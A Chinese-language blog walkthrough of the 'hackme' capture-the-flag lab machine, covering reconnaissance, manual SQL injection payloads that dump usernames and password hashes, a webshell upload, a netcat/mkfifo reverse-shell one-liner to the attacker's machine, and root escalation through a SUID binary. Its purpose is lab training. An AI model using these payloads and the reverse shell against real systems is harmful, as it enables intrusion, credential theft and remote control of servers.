hackme靶机渗透~SQL注入+文件上传

在这里插入图片描述

0x01信息收集

# 主机发现
arp-scan -l

image-20240801221745822!

# 端口扫描
nmap 192.168.66.0/24 --min-rate=1000

image-20240801221959809

# 目录扫描
dirsearch -u http://192.168.66.142

image-20240801222348567

0x02漏洞挖掘

SQL注入

# 进入主页发现登录页面,而且还可以注册用户

image-20240801222502122

# 注册用户 账号:admin 密码:password

image-20240801222805695

# 登录用户查看内容,点击search,发现有书单

image-20240801223115624

# 验证sql注入

image-20240801223603773

image-20240801223637994

# 发现存在SQL注入,使用sqlmap进爆库
sqlmap -u "http://192.168.66.142/welcome.php?id=1" --batch

image-20240801224611096

发现sqlmap没有扫出来,所以我们使用手工注入

# 使用手工注入   判断字节数
Windows OS' order by 4#

image-20240801224926135

image-20240801224946287

判断字节数是3

# 判断回显位置
1' union select 1,2,3 #

image-20240801225154975

# 判断数据库名
-1' union select database(),2,3#

image-20240801225424108

# 查看webapphacking下的所有表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

image-20240801225544815

# 查看users下的所有的字段
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

image-20240801225658267

# 查看user和pasword中的数据
-1' union select group_concat(user),group_concat(pasword),3 from users#

image-20240801225838190

# 将密码用MD5来解码  账号:user1 密码:hello

image-20240801230045591

剩下的用户名和密码用 一样的方法解决即可,这里就不一一列举。

文件上传

# 我们是用刚才爆破的账号和密码来登录,可以发现文件上传点

image-20240811154043293

# 上传木马并抓包进行测试连接

image-20240811154144631

image-20240811154419136

# 尝试访问一下,看一下上传的文件

image-20240811154718209

0x03反弹shell

# 可以看到我们上传的木马成功回显,直接用中国蚁剑进行连接

image-20240811154940116

# 我们在kali上开启一个监听端口8888
nc -lvvp 8888

image-20240811160522799

# 在蚁剑上输入讲shell反弹给kali
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 8888 >/tmp/f
     # ip为kali攻击机的   端口是kali开启的监听端口

image-20240811160836880

0x04 提权

# 识别现在所存在的用户
cat /etc/passwd | gerp /bin/bash

image-20240811161714149

# 在/home/legacy路径下发现一个二进制文件touchmenot,我们通过执行此文件发现提权到root用户
cd /home/legacy
./touchmenot

image-20240811162014587

这个靶场主要是让我们发现SQL注入,然后并进行提权。

好小子,离成功又近一步啊。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值